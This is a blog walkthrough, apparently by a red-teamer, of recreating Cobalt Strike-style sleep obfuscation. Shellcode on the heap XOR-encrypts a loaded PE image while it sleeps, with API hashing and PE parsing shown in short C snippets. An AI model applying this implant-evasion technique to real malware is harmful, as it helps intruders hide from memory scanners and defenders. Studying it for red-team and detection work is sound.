Another challenge we need to tackle is encrypting the `.text` section. Since it contains all the executable code, if we encrypt it, the assembly becomes gibberish and the code can no longer run. But we need the code to run to encrypt the section. So it’s a bit of a chicken and egg problem. Luckily there’s a simple solution: use the heap! We can allocate a buffer of memory dynamically, which will reside inside our process address space, but outside of the `.text` section. But how do we get our C code into that heap buffer to run when it’s always compiled into `.text`? One word: shellcode.
I know we all love writing complex shellcode by hand, but for this project I am going to cheat and use C to create the shellcode for me. ParanoidNinja has a fantastic blog post on exactly this subject, and I will borrow heavily from that post to create my shellcode.
But what does this shellcode need to do exactly? It has two primary functions: encrypt and decrypt the loaded image, and sleep. So we will write a small C function that takes a pointer to the base address of the loaded image and a length of time to sleep. It will change the memory protections of the sections, encrypt them, sleep for the configured time, and then decrypt everything and return.
So the final flow of our program looks like this:
- Generate the shellcode from our C program and include it as a char buffer in our main test program called `sleep.exe`
- In `sleep.exe`, we allocate heap memory for the shellcode and copy it over
- We get the base address of our image and the desired sleep time
- We use the pointer to the heap buffer as a function pointer and call the shellcode like a function, passing in a parameter
- The shellcode will run, encrypt the image, sleep, decrypt, and then return
- We're back inside the `.text` section of `sleep.exe`, so we can continue to do our thing until we want to sleep and repeat the process again
Since it’s the simplest, let’s start with a rundown of `sleep.exe`.
First off, we include the shellcode as a header file. This is generated from the raw binary (which we’ll cover shortly) with `xxd -i shellcode.bin > shellcode.h`. Then we define the struct we will use as a parameter to the shellcode function, which is simply called `run`. The struct contains a pointer for the image base address, a `DWORD` for the sleep time, and a pointer to `MessageBoxA`, so we can have some visible output from the shellcode. In a real implant you would probably want to omit this. Lastly we create a function pointer typedef, so we can call the shellcode buffer like a normal function.
Next we begin our main function. We take in a command line parameter with the sleep time, dynamically resolve `MessageBoxA`, get the image base address with `GetModuleHandleA( NULL )`, and set up the parameter struct. Then we allocate our heap buffer and copy the shellcode payload into it:
Finally we create a function pointer to the shellcode buffer, wait for a keypress so we have time to check things out in Process Hacker, and then we execute the shellcode. If all goes well, it will sleep for our configured time and return to `sleep.exe`, popping some message boxes in the process. Then we’ll press another key to exit, showing that we do indeed have execution back in the `.text` section.
Now we write the C function that will end up as our position-independent shellcode. ParanoidNinja covers this pretty well in his post, so I won’t rehash it all here, but I will mention some salient points we’ll need to account for.
First, when we call functions in shellcode on x64, we need the stack to be 16 byte aligned. We borrow ParanoidNinja’s assembly snippet to do this, using it as the entry point for the shellcode, which then calls our `run` function, then returns to `sleep.exe`.
Next we need to consider calling Win32 APIs from our shellcode. We don’t have the luxury of just calling them as usual, since we don’t know their addresses and have no runtime support, so we need to resolve them ourselves. However, the usual method of calling `GetProcAddress` with the name of the function to resolve is tricky: we would already need to know the address of `GetProcAddress` to call it, and using strings in position-independent shellcode requires them to be spelled out in a `char` array like this: `char MyFunc[] = { 'h', 'i', 0x0 };`. What we can do instead is use the tried and true method of API hashing. I have borrowed a custom `GetProcAddress` implementation to do this from here, combining it with a slightly modified djb2 hash algorithm. Here’s how this looks for `Sleep` and `VirtualProtect`:
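As a rough illustration of the hashing half of this, here is a minimal sketch of the classic djb2 hash and a lookup by hash. The post uses a slightly modified djb2 whose changes are not spelled out, so this is the textbook version, and `find_by_hash` is a hypothetical helper that scans a plain array of names where a real resolver would walk the module's export table.

```c
#include <stddef.h>
#include <stdint.h>

/* Classic djb2: start at 5381, then hash = hash * 33 + c for each byte.
   Assumption: the post's "slightly modified" variant differs from this. */
static uint32_t djb2(const char *s)
{
    uint32_t hash = 5381;
    while (*s) {
        hash = hash * 33u + (uint8_t)*s++;
    }
    return hash;
}

/* Hypothetical helper: return the index of the first name whose hash
   matches `wanted`, or -1 if there is none. In a real resolver the
   names would come from the DLL's export name table. */
static int find_by_hash(const char *const *names, size_t count, uint32_t wanted)
{
    for (size_t i = 0; i < count; i++) {
        if (djb2(names[i]) == wanted) {
            return (int)i;
        }
    }
    return -1;
}
```

In shellcode the wanted hashes would normally be precomputed constants, so that no API name strings appear in the payload at all.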
Now that we’re able to get the function pointers we need, it’s time to address encrypting the image. The way we’ll do this is by parsing the PE header of the loaded image, since it contains all the information we need to find each section in memory. After talking with Waldo-IRC, it turns out I could also have done this with `VirtualQuery`, which would make it a more generalizable process. However, I did it the PE way, so that’s what I’ll cover here.
The first parameter of our argument struct to the shellcode is the base address of the loaded image in memory. This is effectively a pointer to the beginning of the MS-DOS header, so we can use all the usual PE parsing techniques to find the beginning of the section headers. PE parsing can be tedious, so I won’t give a detailed play-by-play, just the highlights.
Once we have the address of the first section header, we can get the three pieces of information we need from it. First is the actual address of the section in memory. The `IMAGE_SECTION_HEADER` structure contains a `VirtualAddress` field, which is a relative virtual address (RVA); adding it to the image base address gives us the actual address of the section in memory.
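To make the header walk concrete, here is a minimal, portable sketch that reads the fields by byte offset from the image base. The offsets follow the PE/COFF layout; the helper names and the `section_info` struct are hypothetical, and the code assumes a little-endian host, which matches how PE fields are stored.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DOS_E_LFANEW_OFF       0x3C /* IMAGE_DOS_HEADER.e_lfanew */
#define NT_NUM_SECTIONS_OFF    6    /* 4-byte signature + 2 */
#define NT_OPT_HEADER_SIZE_OFF 20   /* 4-byte signature + 16 */
#define NT_OPT_HEADER_OFF      24   /* signature + 20-byte file header */
#define SECTION_HEADER_SIZE    40
#define SEC_VIRTUAL_SIZE_OFF   8
#define SEC_VIRTUAL_ADDR_OFF   12
#define SEC_CHARACTERISTICS_OFF 36

/* Hypothetical container for the three fields the post cares about. */
typedef struct {
    uint32_t virtual_size;
    uint32_t virtual_address; /* RVA: add the image base to get the address */
    uint32_t characteristics;
} section_info;

static uint16_t read_u16(const uint8_t *p) { uint16_t v; memcpy(&v, p, sizeof v); return v; }
static uint32_t read_u32(const uint8_t *p) { uint32_t v; memcpy(&v, p, sizeof v); return v; }

/* Number of sections, taken from the file header. */
static uint16_t section_count(const uint8_t *base)
{
    const uint8_t *nt = base + read_u32(base + DOS_E_LFANEW_OFF);
    return read_u16(nt + NT_NUM_SECTIONS_OFF);
}

/* Read section header number `index` (0-based). The section table
   starts right after the optional header. */
static section_info read_section(const uint8_t *base, uint16_t index)
{
    const uint8_t *nt = base + read_u32(base + DOS_E_LFANEW_OFF);
    uint16_t opt_size = read_u16(nt + NT_OPT_HEADER_SIZE_OFF);
    const uint8_t *sec = nt + NT_OPT_HEADER_OFF + opt_size
                       + (size_t)index * SECTION_HEADER_SIZE;
    section_info info;
    info.virtual_size    = read_u32(sec + SEC_VIRTUAL_SIZE_OFF);
    info.virtual_address = read_u32(sec + SEC_VIRTUAL_ADDR_OFF);
    info.characteristics = read_u32(sec + SEC_CHARACTERISTICS_OFF);
    return info;
}
```

On Windows the same walk is usually written with the `IMAGE_DOS_HEADER`, `IMAGE_NT_HEADERS`, and `IMAGE_SECTION_HEADER` structs from `winnt.h` instead of raw offsets.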
Next we need the size of that section in memory. This is stored in the `VirtualSize` field of the section header. However, this is the size of the actual data in the section, not the size of the region it occupies once mapped into memory. Since memory in Windows is managed in pages of 4 kilobytes by default, we round the `VirtualSize` value up to the nearest multiple of 4k. The bit twiddling code to do this was taken from StackOverflow here.
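The rounding itself is a one-liner. This is a minimal sketch of the common add-and-mask idiom, assuming a 4096-byte page; the post's exact snippet may differ, and `round_up_to_page` is a hypothetical name.

```c
#include <stdint.h>

#define PAGE_SIZE_4K 0x1000u /* assumption: default 4 KB pages */

/* Round `size` up to the next multiple of the page size. This works
   because the page size is a power of two: adding (page - 1) pushes any
   partial page over the boundary, and the mask clears the low bits. */
static uint32_t round_up_to_page(uint32_t size)
{
    return (size + PAGE_SIZE_4K - 1u) & ~(PAGE_SIZE_4K - 1u);
}
```

For example, a `VirtualSize` of `0x1234` becomes `0x2000`, while a value that is already page-aligned is left unchanged.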
The last piece of information about the section we need is the memory protection value. This is stored in the `Characteristics` field of the section header. This is a `DWORD` value that looks something like `0x40000040`, with the left-most hex digit encoding the read, write, and execute permissions we care about. We do a little more bit twiddling to isolate this digit by shifting the value right by 28 bits. Once we have it, we save it in an array indexed by the section number so that we can reuse it later to reset the protections:
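A minimal sketch of that extraction follows, together with one possible way to turn the digit back into a page protection constant. The bit meanings come from the `IMAGE_SCN_MEM_*` flags (execute `0x20000000`, read `0x40000000`, write `0x80000000`), and the `SK_PAGE_*` values mirror the `PAGE_*` constants from `winnt.h`, redefined here so the sketch builds anywhere. The mapping function is an assumption; the post does not show how it translates the digit.

```c
#include <stdint.h>

/* Same values as the PAGE_* constants in winnt.h. */
#define SK_PAGE_NOACCESS          0x01u
#define SK_PAGE_READONLY          0x02u
#define SK_PAGE_READWRITE         0x04u
#define SK_PAGE_EXECUTE           0x10u
#define SK_PAGE_EXECUTE_READ      0x20u
#define SK_PAGE_EXECUTE_READWRITE 0x40u

/* Keep only the top hex digit of Characteristics. */
static uint8_t protection_nibble(uint32_t characteristics)
{
    return (uint8_t)(characteristics >> 28);
}

/* Hypothetical mapping from the digit to a page protection value.
   After the shift: 0x2 = execute, 0x4 = read, 0x8 = write. */
static uint32_t nibble_to_page_protection(uint8_t nibble)
{
    int x = nibble & 0x2;
    int r = nibble & 0x4;
    int w = nibble & 0x8;
    if (x) {
        if (w) return SK_PAGE_EXECUTE_READWRITE;
        if (r) return SK_PAGE_EXECUTE_READ;
        return SK_PAGE_EXECUTE;
    }
    if (w) return SK_PAGE_READWRITE;
    if (r) return SK_PAGE_READONLY;
    return SK_PAGE_NOACCESS;
}
```

With this mapping, a typical `.text` value of `0x60000020` yields execute plus read, and a typical `.data` value of `0xC0000040` yields read plus write.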
Now that we can find each section, know its size, and can restore its memory protections, we can finally encrypt. In the same loop where we parsed each section, we call our encryption function:
The encryption/decryption functions take the address, size, and memory protection to apply, as well as a pointer to the `VirtualProtect` function, so that we don’t have to resolve it each time:
To encrypt, we change the memory protections to RW, then XOR each byte of the section. Once we have encrypted each section, we finish by encrypting the PE headers. They reside in a single 4k page starting at the base address. With that, the entire loaded image is encrypted!
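The XOR step can be sketched in a few lines. This is a minimal illustration that assumes a single-byte key, which the post does not specify, and it leaves out the protection changes: a real version would first switch the region to RW through the resolved `VirtualProtect` pointer. `xor_region` is a hypothetical name.

```c
#include <stddef.h>
#include <stdint.h>

/* XOR every byte of a region in place. Running it a second time with
   the same key restores the original bytes, so the same routine serves
   for both encryption and decryption. */
static void xor_region(uint8_t *addr, size_t size, uint8_t key)
{
    for (size_t i = 0; i < size; i++) {
        addr[i] ^= key;
    }
}
```

Because XOR is its own inverse, the only thing that differs between the two directions is which memory protection gets applied afterwards.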
Now that we’ve encrypted the entire image, we can sleep by calling the dynamically resolved `Sleep` function pointer, using the passed-in sleep duration `DWORD`.
Once we’ve finished sleeping, we decrypt everything. We have to make sure that we decrypt the PE headers page first, because we use it to find the addresses of all the other sections. Then we pop a message box to tell us we’re done, and return to `sleep.exe`!
ParanoidNinja covers this part in detail as well, but briefly the process is this:
- Compile the stack alignment assembly and the C code to object files
- Link the two object files together into an EXE
- Use `objcopy` to extract just the `.text` section into a file
- Convert the shellcode file into a `char` array for `sleep.c`
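The last step in the list above is often done with a tool such as `xxd -i`. As a rough sketch of what that conversion amounts to, the hypothetical helper below formats raw bytes as a C array definition. It emits `unsigned char` where the post says `char`, and both the function name and the output layout are assumptions.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: write `len` bytes of `data` into `out` as a C
   array definition called `name`. Returns 0 on success, or -1 if the
   output buffer is too small. */
static int format_c_array(const unsigned char *data, size_t len,
                          const char *name, char *out, size_t out_size)
{
    size_t used;
    int n = snprintf(out, out_size, "unsigned char %s[] = {", name);
    if (n < 0 || (size_t)n >= out_size) return -1;
    used = (size_t)n;

    for (size_t i = 0; i < len; i++) {
        /* First element gets a leading space, the rest a comma. */
        n = snprintf(out + used, out_size - used, "%s0x%02x",
                     i ? ", " : " ", data[i]);
        if (n < 0 || (size_t)n >= out_size - used) return -1;
        used += (size_t)n;
    }

    n = snprintf(out + used, out_size - used, " };");
    if (n < 0 || (size_t)n >= out_size - used) return -1;
    return 0;
}
```

The resulting text can be pasted into `sleep.c` as the payload buffer.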
To verify everything is being encrypted and decrypted properly, we can use Process Hacker to inspect the memory. Here I’ve called `sleep.exe` with a 5-second sleep time. The process has started, but since I haven’t pressed a key, everything is still unencrypted:
Here I have pressed a key and the encryption process has started. I have pressed “Re-Read” memory in Process Hacker, and you can see that the header page has been XOR encrypted:
After the sleep is finished and decryption takes place, we get a message box telling us we’re done. Once we refresh the memory in Process Hacker, we can see we have the PE header page back again!
You can repeat this with each section in Process Hacker and see that they are all indeed encrypted.
I find it really educational to recreate Cobalt Strike features, and this one was no exception. I don’t know if this is at all close to how Cobalt Strike handles sleep obfuscation, but this does seem to be a viable method, and I will likely tweak it further and include it in my C2 framework. If you have any questions or input on this, please let me know or open an issue on GitHub.